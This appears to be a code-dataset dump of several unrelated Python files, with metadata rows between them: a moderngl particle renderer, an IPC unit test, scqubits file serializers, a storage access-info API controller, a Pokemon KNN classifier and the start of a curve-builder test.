self.prog["noise_id"] = self.noise_id // 8
self.prog["projection"].write(self.game.m_cam.mvp)
self.prog["BillboardFace"].write(
self.game.m_cam.bill_rot.astype("f4").tobytes()
)
self.emit_gpu(time, frame_time)
def switch_buffers(self):
self.vao1_rend, self.vao2_rend = self.vao2_rend, self.vao1_rend
def emit_gpu(self, time, frame_time):
self.prog["opacity"] = self.opacity
self.prog["Usenoise"] = (self.equation != 1) and (self.noise_speed != 0)
self.prog["Rotvel"] = self.rotvel
self.texture.use(0)
self.texture_noise.use(10)
self.vao1_rend.render(moderngl.POINTS, vertices=self.system.particles)
class Transformer:
def __init__(self, game, system):
self.game = game
self.system = system
self.geo_declarations = set(["\n"])
self.geo_code = ""
self.geo_target = {}
self.uniforms = set()
def add_geoblock(self, params, target_filter, stage_in, stage_out=None):
title = (
params["title"].strip().lower().replace(" ", "_")
if "filter" in params["title"].lower()
else params["title"][4:].strip().lower().replace(" ", "_")
)
block = self.game.m_res.get_geoblock(title)
self.params = params["content"]
constants = block.split("// CONSTANTS")[1].split("// CONSTANTS_END")[0].strip()
dict_block = {}
if stage_out is not None:
dict_block["%TARGET_STAGE%"] = str(stage_out)
for line in constants.split("\n"):
if line[:5] == "// --":
continue
perc_parts = line.split("%")
typ = perc_parts[0]
varn = perc_parts[1]
if typ in ("float", "int",):
dict_block[f"%{varn}%"] = str(self.r(varn))
if typ in ("bool",):
dict_block[f"%{varn}%"] = "true" if self.r(varn, t="b") else "false"
if typ == "vec3":
dict_block[
f"%{varn}%"
] = f"""vec3{str((str(self.r(f"{varn}_X")), str(self.r(f"{varn}_Y")), str(self.r(f"{varn}_Z")))).replace("'","")}"""
geo_declarations, geo_code = block.split("// DECLARATIONS_END")
if stage_in is not None:
geo_code = "\n".join([f"if(pos.a=={stage_in})", "{", geo_code, "}"])
geo_declarations = set(
[
f"{x.strip()};"
for x in geo_declarations.split("// DECLARATIONS")[-1].split(";")
if x.strip()
]
)
for k, v in dict_block.items():
geo_code = geo_code.replace(k, v)
self.geo_declarations = self.geo_declarations | geo_declarations
if stage_out is not None:
# is filter
if params["outputs"][0]["id"] in self.geo_target:
geo_code = geo_code.replace(
r"%GEOBLOCKS%", self.geo_target[params["outputs"][0]["id"]]
)
else:
geo_code = geo_code.replace(r"%GEOBLOCKS%", "")
# print(geo_code)
if target_filter is not None:
# print("I HAVE A FILTER")
self.geo_target[target_filter] = geo_code
else:
# print("I HAVE NO FILTER")
self.geo_code += geo_code
def r(self, query, t="f"):
# print("\n", query)
unparsed = self.system.r(self, query, parse=False)
# print(query, unparsed)
if not isinstance(unparsed, bool) and "!" in unparsed:
for key in self.system.equations.keys():
if f"!{key}!" in unparsed:
unparsed = unparsed.replace(f"!{key}!", f"UNI_{key}")
self.uniforms.add(key)
# key = f"UNI_{len(self.uniforms)}"
# self.uniforms[key] = unparsed
return f"({unparsed})"
if t == "b":
result = self.system.r(self, query)
return bool(result)
return f"({unparsed})"
def on_tick(self, time, frame_time):
return self.render(time, frame_time)
def load_programs(self):
# print("\n".join(self.geo_declarations) + self.geo_code)
self.prog_trans = self.game.m_res.get_program_varyings(
"p4_transform_ver",
"p4_transform_geo",
geoblocks="\n".join(self.geo_declarations) + self.geo_code,
uniforms="\n".join(
[f"uniform float UNI_{x};" for x in self.system.equations.keys()]
),
varyings=self.game.m_par.get_varyings(),
)
def load_context_objects(self):
# Transform vaos. We transform data back and forth to avoid buffer copy
self.vao1_trans = self.game.ctx.vertex_array(
self.prog_trans, [self.game.m_par.vao_def(self.system.vbo1, render=False)],
)
self.vao2_trans = self.game.ctx.vertex_array(
self.prog_trans, [self.game.m_par.vao_def(self.system.vbo2, render=False)],
)
def render(self, time, frame_time):
self.emit_gpu(time, frame_time)
return
def switch_buffers(self):
# Swap around objects for next frame
self.vao1_trans, self.vao2_trans = (
self.vao2_trans,
self.vao1_trans,
)
def emit_gpu(self, time, frame_time):
for key in self.uniforms:
self.prog_trans[f"UNI_{key}"] = self.system.p(f"!{key}!")
self.prog_trans["StepSize"] = self.system.step_size
self.prog_trans["time"] = max(time, 0)
# Transform all particle recoding how many elements were emitted by geometry shader
with self.game.query:
self.vao1_trans.transform(
self.system.vbo2, moderngl.POINTS, vertices=self.system.particles
)
self.system.particles = self.game.query.primitives
class Trigger:
def __init__(self, game, system, params):
self.game = game
self.system = system
self.N = self.system.N
self.params = params["content"]
self.title = "Trigger"
self.sound = str(self.system.r(self, "sound_path"))
self.game.r_aud.cache_effect(self.sound)
self.emit_want = 0
self.last_time = self.system.time_alive
self.counters = 0
self.alive = True
self.set_fields()
def set_fields(self):
self.duration = float(self.system.r(self, "duration"))
self.emit_count = float(self.system.r(self, "count"))
self.delay = float(self.system.r(self, "delay"))
self.hit = float(self.system.r(self, "hit"))
self.hit_enabled = bool(self.system.r(self, "hit_enabled"))
self.sound_enabled = bool(self.system.r(self, "sound_enabled"))
self.shake = float(self.system.r(self, "shake"))
self.shake_enabled = bool(self.system.r(self, "shake_enabled"))
self.dark_enabled = bool(self.system.r(self, "dark_enabled"))
self.dark_recover = bool(self.system.r(self, "dark_recover"))
self.dark = float(self.system.r(self, "dark"))
self.dark_speed = float(self.system.r(self, "dark_speed"))
self.dark_speed_enabled = bool(self.system.r(self, "dark_speed_enabled"))
def on_tick(self, time, frame_time):
return self.render(time, frame_time)
def on_exit(self):
pass
def render(self, time):
self.set_fields()
emit_count = 0
# self.active_particles = 0
if self.delay < time < self.delay + self.duration:
self.emit_want += self.emit_count * (time - self.last_time)
emit_count = int(self.emit_want + 1)
if emit_count > 0: # and not int(time * 6) % 10:
self.emit_want -= emit_count
self.game.r_aud.play_effect(self.sound)
if self.dark_enabled:
self.system.brender.set_dark(
self.dark,
self.dark_speed if self.dark_speed_enabled else None,
self.dark_recover,
)
if self.shake_enabled:
self.system.brender.battle_shake = self.shake
self.last_time = time
class Actor:
def __init__(self, game, system, params):
self.game = game
self.system = system
self.N = self.system.N
self.params = params["content"]
self.title = "Trigger"
self.emit_want = 0
self.last_time = self.system.time_alive
self.fired = False
self.counters = 0
self.alive = True
self.set_fields()
def set_fields(self):
self.duration = float(self.system.r(self, "duration"))
self.continuous = bool(self.system.r(self, "continuous"))
self.delay = float(self.system.r(self, "delay"))
self.user_enabled = bool(self.system.r(self, "user_enabled"))
self.user_recover = bool(self.system.r(self, "user_recover"))
self.user = (
float(self.system.r(self, "user_x")),
float(self.system.r(self, "user_y")),
float(self.system.r(self, "user_z")),
)
self.user_speed = float(self.system.r(self, "user_speed"))
self.user_speed_enabled = bool(self.system.r(self, "user_speed_enabled"))
self.target_enabled = bool(self.system.r(self, "target_enabled"))
self.target_recover = bool(self.system.r(self, "target_recover"))
self.target = (
float(self.system.r(self, "target_x")),
float(self.system.r(self, "target_y")),
float(self.system.r(self, "target_z")),
)
self.target_speed = float(self.system.r(self, "target_speed"))
self.target_speed_enabled = bool(self.system.r(self, "target_speed_enabled"))
def on_tick(self, time, frame_time):
return self.render(time, frame_time)
def on_exit(self):
pass
def render(self, time):
self.set_fields()
emit_count = 0
# self.active_particles = 0
if self.delay < time < self.delay + self.duration:
if self.continuous or not self.fired:
self.fired = True
if self.user_enabled:
self.system.brender.set_movement(
1 if self.system.target[0] == 0 else 0,
(
self.user[0] * self.system.basis[0],
self.user[1] * self.system.basis[1],
self.user[2] * self.system.basis[2],
),
self.user_speed if self.user_speed_enabled else None,
self.user_recover,
)
if self.target_enabled:
self.system.brender.set_movement(
0 if self.system.target[0] == 0 else 1,
(
self.target[0] * self.system.basis[0],
self.target[1] * self.system.basis[1],
self.target[2] * self.system.basis[2],
),
self.target_speed if self.target_speed_enabled else None,
self.target_recover,
)
self.last_time = time
class Camera:
def __init__(self, game, system, params):
self.game = game
self.system = system
self.params = params["content"]
self.title = "Camera"
self.fired = False
self.emit_want = 0
self.last_time = self.system.time_alive
self.counters = 0
self.alive = True
self.set_fields()
def set_fields(self):
self.duration = float(self.system.r(self, "duration"))
self.emit_count = float(self.system.r(self, "count"))
self.delay = float(self.system.r(self, "delay"))
self.mirror = str(self.system.r(self, "mirror"))
self.target = float(self.system.r(self, "target"))
self.speed = float(self.system.r(self, "speed"))
self.friction = float(self.system.r(self, "friction"))
self.target = (
(180 - self.target) % 360 if self.system.target[0] == 0 else self.target
)
def on_tick(self, time, frame_time):
return self.render(time, frame_time)
def on_exit(self):
pass
def render(self, time):
self.set_fields()
emit_count = 0
# self.active_particles = 0
if self.delay < time < self.delay + self.duration:
self.emit_want += self.emit_count * (time - self.last_time)
emit_count = int(self.emit_want + 1)
if emit_count > 0: # and not int(time * 6) % 10:
self.emit_want -= emit_count
self.game.m_cam.go_to(self.target, self.speed)
class Camrail:
def __init__(self, game, system, params):
self.game = game
self.system = system
self.params = params["content"]
self.title = "Camera"
self.counters = 0
self.alive = True
self.set_fields()
def set_fields(self):
self.mirror = str(self.system.r(self, "mirror"))
self.delay = float(self.system.r(self, "delay"))
self.target = float(self.system.r(self, "target"))
self.speed = float(self.system.r(self, "speed"))
self.friction = float(self.system.r(self, "friction"))
def on_tick(self, time, frame_time):
return self.render(time, frame_time)
def on_exit(self):
pass
def render(self, time, frame_time):
self.set_fields()
emit_count = 0
self.counters += frame_time
# self.active_particles = 0
if self.delay < self.counters < self.delay + self.duration:
self.emit_want += self.emit_count * frame_time
emit_count = int(self.emit_want + 1)
if emit_count > 0: # and not int(time * 6) % 10:
self.emit_want -= emit_count
| 35.661389 | 132 | 0.546622 | 3,660 | 29,278 | 4.21694 | 0.088525 | 0.086173 | 0.060581 | 0.08261 | 0.600492 | 0.51406 | 0.415576 | 0.341195 | 0.303356 | 0.287482 | 0 | 0.01079 | 0.319455 | 29,278 | 820 | 133 | 35.704878 | 0.763814 | 0.049559 | 0 | 0.3552 | 0 | 0.0048 | 0.07984 | 0.007995 | 0 | 0 | 0 | 0.00122 | 0 | 1 | 0.0832 | false | 0.0096 | 0.0048 | 0.0096 | 0.1296 | 0.0032 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f6723d1d3ec3bf091fc0f8a529233ad8594ca943 | 1,764 | py | Python | server/comm/tests/IpcCommTest.py | belre/DllWrapper-Win32Pipe | e2a81689cb3018a8ee79a9d5e38d0f32dc979997 | [
"MIT"
] | null | null | null | server/comm/tests/IpcCommTest.py | belre/DllWrapper-Win32Pipe | e2a81689cb3018a8ee79a9d5e38d0f32dc979997 | [
"MIT"
] | null | null | null | server/comm/tests/IpcCommTest.py | belre/DllWrapper-Win32Pipe | e2a81689cb3018a8ee79a9d5e38d0f32dc979997 | [
"MIT"
] | null | null | null | import unittest
from comm import IpcComm
from comm import IpcTransmitter
import json
class IpcCommTest(unittest.TestCase):
def setUp(self):
pass
def test_IpcCommTest_0011(self):
"""
テストケースNo.11
"""
### No.11-1 コンストラクタ生成 ###
try:
com_obj = IpcComm.IpcComm(None)
assert(True)
except:
self.fail()
### No.11-2 正常メッセージ伝送 ###
state = IpcComm.IpcState()
try:
assert( com_obj.Execute("hoge", 5, json.dumps({"test1": 3, "test2":"str"}), state) == 0)
except:
self.fail()
### No.11-3 コマンドがnull ###
try:
assert( com_obj.Execute(None, 5, json.dumps({"test1": 3, "test2":"str"}), state) != 0)
except:
self.fail()
### No.11-4 パラメータがJSON形式になっていない ###
try:
assert( com_obj.Execute("hoge", 5, "ABCDEFGHI", state) != 0)
except:
self.fail()
### No.11-5 パラメータがnullになっている ###
try:
assert( com_obj.Execute("hoge", 5, None, state) != 0)
except:
self.fail()
### No.11-6 seqNo<0 ###
try:
assert( com_obj.Execute("hoge", -5, json.dumps({"test1": 3, "test2":"str"}), state) != 0)
except:
self.fail()
### No.11-7 stateがnull ###
try:
assert( com_obj.Execute("hoge", -5, json.dumps({"test1": 3, "test2":"str"}), None) != 0)
except:
self.fail()
### No.11-8 parameter=""(空白) ###
state = IpcComm.IpcState()
try:
assert( com_obj.Execute("hoge", 5, "", state) == 0)
except:
self.fail()
def tearDown(self):
pass
| 23.837838 | 101 | 0.475624 | 192 | 1,764 | 4.317708 | 0.286458 | 0.038601 | 0.135103 | 0.135103 | 0.595899 | 0.523522 | 0.500603 | 0.377563 | 0.377563 | 0.377563 | 0 | 0.050577 | 0.361111 | 1,764 | 73 | 102 | 24.164384 | 0.685004 | 0.105442 | 0 | 0.622222 | 0 | 0 | 0.056441 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 1 | 0.066667 | false | 0.044444 | 0.088889 | 0 | 0.177778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f672cd8f72a56c9f5ec0fdbb9ba4d18a17feb3e0 | 10,093 | py | Python | scqubits/io_utils/fileio_serializers.py | saipavanc/scqubits | a99ff75498110558c64e6a6e276834e5714793a5 | [
"BSD-3-Clause"
] | 108 | 2019-12-14T16:08:04.000Z | 2022-03-21T03:48:33.000Z | scqubits/io_utils/fileio_serializers.py | saipavanc/scqubits | a99ff75498110558c64e6a6e276834e5714793a5 | [
"BSD-3-Clause"
] | 62 | 2019-12-14T02:41:00.000Z | 2022-02-06T07:32:42.000Z | scqubits/io_utils/fileio_serializers.py | saipavanc/scqubits | a99ff75498110558c64e6a6e276834e5714793a5 | [
"BSD-3-Clause"
] | 46 | 2019-12-21T12:13:11.000Z | 2022-03-31T17:09:53.000Z | # fileio_serializers.py
#
# This file is part of scqubits: a Python package for superconducting qubits,
# arXiv:2107.08552 (2021). https://arxiv.org/abs/2107.08552
#
# Copyright (c) 2019 and later, Jens Koch and Peter Groszkowski
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
############################################################################
"""
Helper classes for writing data to files.
"""
import inspect
from abc import ABC, ABCMeta
from collections import OrderedDict
from numbers import Number
from typing import TYPE_CHECKING, Any, Callable, Dict, List, Tuple, Union
import numpy as np
from numpy import ndarray
from scipy.sparse import csc_matrix
import scqubits.utils.misc as utils
if TYPE_CHECKING:
from scqubits.io_utils.fileio import IOData
SERIALIZABLE_REGISTRY = {}
class Serializable(ABC):
"""Mix-in class that makes descendant classes serializable."""
_subclasses: List[ABCMeta] = []
def __new__(cls: Any, *args, **kwargs) -> "Serializable":
"""Modified `__new__` to set up `cls._init_params`. The latter is used to
record which of the `__init__` parameters are to be stored/read in file IO."""
cls._init_params = get_init_params(cls)
return super().__new__(cls)
def __init_subclass__(cls) -> None:
"""Used to register all non-abstract subclasses as a list in
`QuantumSystem.subclasses`."""
super().__init_subclass__()
if not inspect.isabstract(cls):
cls._subclasses.append(cls)
SERIALIZABLE_REGISTRY[cls.__name__] = cls
@classmethod
def deserialize(cls, io_data: "IOData") -> "Serializable":
"""
Take the given IOData and return an instance of the described class,
initialized with the data stored in io_data.
"""
return cls(**io_data.as_kwargs())
def serialize(self) -> "IOData":
"""
Convert the content of the current class instance into IOData format.
"""
initdata = {name: getattr(self, name) for name in self._init_params}
if hasattr(self, "_id_str"):
initdata["id_str"] = self._id_str # type:ignore
iodata = dict_serialize(initdata)
iodata.typename = type(self).__name__
return iodata
def filewrite(self, filename: str) -> None:
"""Convenience method bound to the class. Simply accesses the `write`
function."""
import scqubits.io_utils.fileio as io
io.write(self, filename)
@classmethod
def create_from_file(cls, filename: str) -> object:
"""Read initdata and spectral data from file, and use those to create a new
SpectrumData object.
Returns
-------
SpectrumData
new SpectrumData object, initialized with data read from file
"""
import scqubits.io_utils.fileio as io
return io.read(filename)
def _add_object(
name: str,
obj: object,
attributes: Dict[str, Any],
ndarrays: Dict[str, ndarray],
objects: Dict[str, object],
) -> Tuple[Dict, Dict, Dict]:
objects[name] = obj
return attributes, ndarrays, objects
def _add_ndarray(
name: str,
obj: ndarray,
attributes: Dict[str, Any],
ndarrays: Dict[str, ndarray],
objects: Dict[str, object],
) -> Tuple[Dict, Dict, Dict]:
ndarrays[name] = obj
return attributes, ndarrays, objects
def _add_attribute(
name: str,
obj: Any,
attributes: Dict[str, Any],
ndarrays: Dict[str, ndarray],
objects: Dict[str, object],
) -> Tuple[Dict, Dict, Dict]:
attributes[name] = obj
return attributes, ndarrays, objects
TO_ATTRIBUTE = (str, Number, dict, list, tuple, bool, np.bool_)
TO_NDARRAY = (np.ndarray,)
TO_OBJECT = (Serializable,)
def type_dispatch(entity: Serializable) -> Callable:
"""
Based on the type of the object ``entity``, return the appropriate function that
converts the entity into the appropriate category of IOData
"""
if isinstance(entity, TO_ATTRIBUTE):
return _add_attribute
if isinstance(entity, TO_OBJECT):
return _add_object
if isinstance(entity, TO_NDARRAY):
if entity.dtype == "O":
return _add_object
return _add_ndarray
# no match, try treating as object, though this may fail
return _add_object
def dict_serialize(dict_instance: Dict[str, Any]) -> "IOData":
"""
Create an IOData instance from dictionary data.
"""
import scqubits.io_utils.fileio as io
dict_instance = utils.remove_nones(dict_instance)
attributes: Dict[str, Any] = {}
ndarrays: Dict[str, ndarray] = {}
objects: Dict[str, object] = {}
typename = "dict"
for name, content in dict_instance.items():
update_func = type_dispatch(content)
attributes, ndarrays, objects = update_func(
name, content, attributes, ndarrays, objects
)
return io.IOData(typename, attributes, ndarrays, objects)
def OrderedDict_serialize(dict_instance: Dict[str, Any]) -> "IOData":
"""
Create an IOData instance from dictionary data.
"""
import scqubits.io_utils.fileio as io
dict_instance = utils.remove_nones(dict_instance)
attributes: Dict[str, Any] = {}
ndarrays: Dict[str, ndarray] = {}
objects: Dict[str, object] = {}
typename = "OrderedDict"
for name, content in dict_instance.items():
update_func = type_dispatch(content)
attributes, ndarrays, objects = update_func(
name, content, attributes, ndarrays, objects
)
return io.IOData(typename, attributes, ndarrays, objects)
def csc_matrix_serialize(csc_matrix_instance: csc_matrix) -> "IOData":
"""
Create an IOData instance from dictionary data.
"""
import scqubits.io_utils.fileio as io
attributes: Dict[str, Any] = {}
ndarrays: Dict[str, ndarray] = {}
objects: Dict[str, object] = {}
typename = "csc_matrix"
csc_dict = {
"indices": csc_matrix_instance.indices,
"indptr": csc_matrix_instance.indptr,
"shape": csc_matrix_instance.shape,
"data": csc_matrix_instance.data,
}
for name, content in csc_dict.items():
update_func = type_dispatch(content)
attributes, ndarrays, objects = update_func(
name, content, attributes, ndarrays, objects
)
return io.IOData(typename, attributes, ndarrays, objects)
def NoneType_serialize(none_instance: None) -> "IOData":
"""
Create an IOData instance to write `None` to file.
"""
import scqubits.io_utils.fileio as io
attributes = {"None": 0}
ndarrays: Dict[str, ndarray] = {}
objects: Dict[str, object] = {}
typename = "NoneType"
return io.IOData(typename, attributes, ndarrays, objects)
def listlike_serialize(listlike_instance: Union[List, Tuple]) -> "IOData":
"""
Create an IOData instance from list data.
"""
import scqubits.io_utils.fileio as io
attributes: Dict[str, Any] = {}
ndarrays: Dict[str, ndarray] = {}
objects: Dict[str, object] = {}
typename = type(listlike_instance).__name__
for index, item in enumerate(listlike_instance):
update_func = type_dispatch(item)
attributes, ndarrays, objects = update_func(
str(index), item, attributes, ndarrays, objects
)
return io.IOData(typename, attributes, ndarrays, objects)
list_serialize = listlike_serialize
tuple_serialize = listlike_serialize
ndarray_serialize = listlike_serialize # this is invoked for dtype=object
def range_serialize(range_instance: range) -> "IOData":
"""
Create an IOData instance from range data.
"""
import scqubits.io_utils.fileio as io
attributes = {
"start": range_instance.start,
"stop": range_instance.stop,
"step": range_instance.step,
}
ndarrays: Dict[str, ndarray] = {}
objects: Dict[str, object] = {}
typename = type(range_instance).__name__
return io.IOData(typename, attributes, ndarrays, objects)
def dict_deserialize(iodata: "IOData") -> Dict[str, Any]:
"""Turn IOData instance back into a dict"""
return dict(**iodata.as_kwargs())
def OrderedDict_deserialize(iodata: "IOData") -> Dict[str, Any]:
"""Turn IOData instance back into a dict"""
return OrderedDict([(name, values) for name, values in iodata.as_kwargs().items()])
def csc_matrix_deserialize(iodata: "IOData") -> csc_matrix:
"""Turn IOData instance back into a csc_matrix"""
csc_dict = dict(**iodata.as_kwargs())
return csc_matrix(
(csc_dict["data"], csc_dict["indices"], csc_dict["indptr"]),
shape=csc_dict["shape"],
)
def NoneType_deserialize(iodata: "IOData") -> None:
"""Turn IOData instance back into a csc_matrix"""
return None
def list_deserialize(iodata: "IOData") -> List[Any]:
"""Turn IOData instance back into a list"""
dict_data = iodata.as_kwargs()
return [dict_data[key] for key in sorted(dict_data, key=int)]
def tuple_deserialize(iodata: "IOData") -> Tuple:
"""Turn IOData instance back into a tuple"""
return tuple(list_deserialize(iodata))
# this is invoked for ndarrays with dtype=object
def ndarray_deserialize(iodata: "IOData") -> ndarray:
return np.asarray(list_deserialize(iodata), dtype=object)
def range_deserialize(iodata: "IOData") -> range:
arguments = iodata.as_kwargs()
return range(arguments["start"], arguments["stop"], arguments["step"])
def get_init_params(obj: Serializable) -> List[str]:
"""
Returns a list of the parameters entering the `__init__` method of the given
object `obj`.
"""
init_params = list(inspect.signature(obj.__init__).parameters.keys()) # type: ignore
if "self" in init_params:
init_params.remove("self")
if "kwargs" in init_params:
init_params.remove("kwargs")
# if "id_str" in init_params:
# init_params.remove("id_str")
return init_params
| 30.218563 | 89 | 0.661151 | 1,235 | 10,093 | 5.234008 | 0.176518 | 0.031405 | 0.065749 | 0.029239 | 0.384901 | 0.375155 | 0.342203 | 0.332766 | 0.280167 | 0.26547 | 0 | 0.003442 | 0.222729 | 10,093 | 333 | 90 | 30.309309 | 0.820523 | 0.211434 | 0 | 0.362162 | 0 | 0 | 0.034574 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135135 | false | 0 | 0.097297 | 0.005405 | 0.389189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f6748a527fcca89db5882d6c5fe0f761006224a7 | 2,328 | py | Python | dolphin/api/v1/access_info.py | ThisIsClark/dolphin | 204cffd3faa1c83fde90942537737fe441406cd1 | [
"Apache-2.0"
] | null | null | null | dolphin/api/v1/access_info.py | ThisIsClark/dolphin | 204cffd3faa1c83fde90942537737fe441406cd1 | [
"Apache-2.0"
] | null | null | null | dolphin/api/v1/access_info.py | ThisIsClark/dolphin | 204cffd3faa1c83fde90942537737fe441406cd1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The SODA Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from webob import exc
from dolphin import db
from dolphin import exception
from dolphin.api import validation
from dolphin.api.common import wsgi
from dolphin.api.schemas import access_info as schema_access_info
from dolphin.api.views import access_info as access_info_viewer
from dolphin.drivers import api as driverapi
class AccessInfoController(wsgi.Controller):
def __init__(self):
super(AccessInfoController, self).__init__()
self._view_builder = access_info_viewer.ViewBuilder()
self.driver_api = driverapi.API()
def show(self, req, id):
"""Show access information by storage id."""
ctxt = req.environ['dolphin.context']
try:
access_info = db.access_info_get(ctxt, id)
except exception.AccessInfoNotFound as e:
raise exc.HTTPNotFound(explanation=e.msg)
return self._view_builder.show(access_info)
@validation.schema(schema_access_info.update)
def update(self, req, id, body):
"""Update storage access information."""
ctxt = req.environ.get('dolphin.context')
try:
access_info = db.access_info_get(ctxt, id)
access_info.update(body)
access_info = self.driver_api.update_access_info(ctxt, access_info)
except (exception.InvalidCredential,
exception.InvalidResults,
exception.StorageDriverNotFound,
exception.AccessInfoNotFound,
exception.StorageNotFound,
exception.StorageSerialNumberMismatch) as e:
raise exc.HTTPBadRequest(explanation=e.msg)
return self._view_builder.show(access_info)
def create_resource():
return wsgi.Resource(AccessInfoController())
| 36.375 | 79 | 0.707904 | 290 | 2,328 | 5.544828 | 0.413793 | 0.099502 | 0.034826 | 0.019901 | 0.121891 | 0.121891 | 0.121891 | 0.121891 | 0.121891 | 0.121891 | 0 | 0.004384 | 0.216065 | 2,328 | 63 | 80 | 36.952381 | 0.876712 | 0.270189 | 0 | 0.162162 | 0 | 0 | 0.0179 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0 | 0.216216 | 0.027027 | 0.432432 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f674f950bc65f3ca25e588c8f6a8f3b548831ffe | 1,826 | py | Python | Pokemon/LegendaryPokemonKNN.py | pranavj1001/MachineLearningRecipes | 513e24ba0b5a8994158131cb0c84e779eee78c68 | [
"MIT"
] | 2 | 2018-01-14T06:14:44.000Z | 2018-01-15T15:35:07.000Z | Pokemon/LegendaryPokemonKNN.py | pranavj1001/MachineLearningRecipes | 513e24ba0b5a8994158131cb0c84e779eee78c68 | [
"MIT"
] | null | null | null | Pokemon/LegendaryPokemonKNN.py | pranavj1001/MachineLearningRecipes | 513e24ba0b5a8994158131cb0c84e779eee78c68 | [
"MIT"
] | 2 | 2019-06-10T09:01:20.000Z | 2019-12-05T01:10:48.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 24 23:08:26 2017
@author: pranavjain
This model classifies a pokemon as legendary or not-legendary.
Required Data to predict Hit Points, Attack Points, Defence Points, Special Attack Points, Special Defence Points, Speed Points
"""
# import libraries
import pandas as pd
import numpy as np
# get data from the dataset
dataset = pd.read_csv('Pokemon.csv')
X = dataset.iloc[:, [5,6,7,8,9,10]].values
y = dataset.iloc[:, 12].values
# do this for labelEncoding since it is deprecated to directly use 1d arrays
y.reshape(-1, 1)
# Label Encode the y set
# False -> 0
# True -> 1
from sklearn.preprocessing import LabelEncoder
labelEncoder_y = LabelEncoder()
y = labelEncoder_y.fit_transform(y)
# Splitting the dataset into the Training set and Test set
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# Fitting K-NN to the Training set
from sklearn.neighbors import KNeighborsClassifier
classifier = KNeighborsClassifier(n_neighbors = 5, metric = 'minkowski', p = 2)
classifier.fit(X_train, y_train)
# predict our test results
y_pred = classifier.predict(X_test)
# to calculate the number of results that we got wrong
# eg. here we predicted only 15 wrong out of 200
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
# predict for custom values
# Arguments(Hit Points, Attack Points, Defence Points, Special Attack Points, Special Defence Points, Speed Points)
test = np.matrix('106 190 100 154 100 130')
test =sc.transform(test)
pred = classifier.predict(test)
| 30.949153 | 127 | 0.766703 | 288 | 1,826 | 4.760417 | 0.482639 | 0.040117 | 0.021882 | 0.030635 | 0.122538 | 0.122538 | 0.122538 | 0.122538 | 0.122538 | 0.122538 | 0 | 0.036492 | 0.144578 | 1,826 | 58 | 128 | 31.482759 | 0.841229 | 0.451807 | 0 | 0 | 0 | 0 | 0.044012 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.291667 | 0 | 0.291667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f675b2a5f4cdacd4a31a0ac2238ec1c5c5d23ed6 | 4,392 | py | Python | test/test_builder.py | equinor/curvy | 791a2202f02fd0c86797d7052deeca50333e66f6 | [
"MIT"
] | 3 | 2021-03-17T01:00:50.000Z | 2021-06-20T03:17:50.000Z | test/test_builder.py | Statoil/curvy | 791a2202f02fd0c86797d7052deeca50333e66f6 | [
"MIT"
] | 1 | 2022-02-11T16:57:29.000Z | 2022-02-13T19:56:59.000Z | test/test_builder.py | Statoil/curvy | 791a2202f02fd0c86797d7052deeca50333e66f6 | [
"MIT"
] | 3 | 2019-03-11T12:17:03.000Z | 2022-02-15T03:37:27.000Z | import unittest
from curvy import builder, axis
import datetime
import numpy as np
taus = [[2,5],[5,7],[7,11]]
prices = [3,5,4]
knots = [5,7]
class TestBuilderMethods(unittest.TestCase):
def test_calc_H(self):
H = np.load('test/test_files/H.npy')
np.testing.assert_array_equal(
builder.calc_H(2, 5),
H
)
def test_calc_big_H(self):
big_H = np.load('test/test_files/big_H.npy')
np.testing.assert_array_equal(
builder.calc_big_H(taus),
big_H
)
def test_avg_constraint(self):
avg_constraint = np.load('test/test_files/avg_constraint.npy')
np.testing.assert_array_equal(
builder.calc_avg_constraint(2,5),
avg_constraint
)
def test_calc_constraints(self):
constraints = np.load('test/test_files/constraints.npy')
